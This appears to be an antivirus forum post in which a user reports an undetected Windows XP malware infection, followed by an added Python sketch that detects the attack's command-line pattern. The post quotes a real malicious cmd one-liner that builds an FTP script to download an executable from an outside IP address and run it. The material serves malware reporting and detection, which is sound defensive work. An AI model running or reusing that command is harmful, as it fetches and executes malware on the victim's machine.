Hello,
we have the same malware here it seems.
It is seen the same way by PrevX1, and it regularly activates some cmd script TFTPxx.
It also creates louvz.exe and others in c:\windows\system32 and launches them, and a lot of bad things!
example in a cmd : cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
It is MSQRSM, not detected by Avast, nor by other anti-virus (NAV, Grisoft) or anti-spyware (Ad-Aware),
but detected by PREVX1.
I’d like to send you the .exe file (237kb) for analysis and integration into the Avast database, but it is in c:\system volume information-RESTORE{F75EEC69-6E97-419B-93B4-6A3A275301C4}\RP296\AA0044493.exe
and not accessible.
I deactivated Windows restoration on all hard drives and rebooted, but still no access to this directory, neither directly nor for anti-virus software!
I am working remotely on my father’s PC, and can’t boot from a DOS disk!
Any idea, please, how to copy this file and send it to you?
It came by clicking a url in an HTML spam email … but I erased the email (just too soon…)
OS = Windows XP SP2 Home, up to date with updates
Avast version 4.7.871 August 2006 - skin 4.2.7.3
Athlon 64 3200+ 512 MB ram
Mail client: Thunderbird
NAV + Avast
The software launches CMD windows with TFTP xx download scripts, it prevents Mozilla and Thunderbird from connecting to the web and to SMTP / POP accounts, it creates various exe files in windows/system32, which are executed (seen in the Task Manager), etc. QUITE HARMFUL…
Thanks
FX
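
Added example (not part of FX's post, and not Avast or PrevX code): a Python sketch of how a defender could flag the command-line shape quoted in the post, where a chain of echo redirections builds an FTP script that is then run with `ftp -s:` and the fetched file is started. The function name `analyze` and the two benign sample lines are constructed for illustration, and splitting on `&` ignores cmd.exe quoting rules.

```python
import re

# "echo <text> > file" or ">> file": one line written into a script file.
ECHO_RE = re.compile(r"\becho\s+(.*?)\s*(>>?)\s*([^\s&>]+)", re.I)
# "ftp ... -s:file": the FTP client told to read its commands from a file.
FTP_RE = re.compile(r"\bftp(?:\.exe)?\s[^&]*?-s:([^\s&]+)", re.I)

def analyze(cmdline):
    """Return details of an echo-built FTP download chain, or None."""
    steps = [s.strip() for s in cmdline.split("&") if s.strip()]
    scripts = {}  # script file name -> lines echoed into it so far
    for i, step in enumerate(steps):
        echo = ECHO_RE.search(step)
        if echo:
            text, op, target = echo.groups()
            key = target.lower()
            if op == ">":  # ">" truncates the file, ">>" appends to it
                scripts[key] = []
            scripts.setdefault(key, []).append(text)
            continue
        ftp = FTP_RE.search(step)
        # An FTP script that already existed on disk is not this pattern.
        if not ftp or ftp.group(1).lower() not in scripts:
            continue
        lines = [l.split() for l in scripts[ftp.group(1).lower()]]
        server = next((l[1:] for l in lines if l and l[0].upper() == "OPEN"), [])
        fetched = [l[1] for l in lines
                   if len(l) > 1 and l[0].upper() in ("GET", "RECV")]
        # First token of every later step: was a fetched file started?
        later = {s.split()[0].strip('"').lower() for s in steps[i + 1:]}
        return {
            "server": " ".join(server),
            "fetched": fetched,
            "executed": [f for f in fetched if f.lower() in later],
        }
    return None

# Command line exactly as quoted in the post above.
POST_CMD = ("cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x"
            "&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit")
# Constructed benign lines: a log append and a pre-existing FTP script.
BENIGN = [r"cmd /c echo Backup finished>>C:\logs\backup.log",
          r"ftp -n -s:C:\scripts\nightly.txt"]

if __name__ == "__main__":
    for line in [POST_CMD] + BENIGN:
        print(analyze(line), "<-", line[:60])
```

Run over process-creation logs, a non-empty `executed` list is the strongest signal, since it means the same command line both downloaded a file and launched it.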